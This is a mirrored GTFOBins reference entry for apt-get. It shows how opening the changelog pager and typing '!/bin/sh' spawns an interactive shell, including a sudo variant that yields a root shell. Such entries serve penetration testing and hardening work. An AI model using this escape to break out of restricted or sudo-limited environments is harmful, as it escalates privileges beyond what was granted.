1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/apt-get.md

13 lines
306 B
Markdown
Raw Normal View History

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
execute-interactive:
- code: |
apt-get changelog apt
!/bin/sh
sudo-enabled:
- code: |
sudo apt-get changelog apt
!/bin/sh
---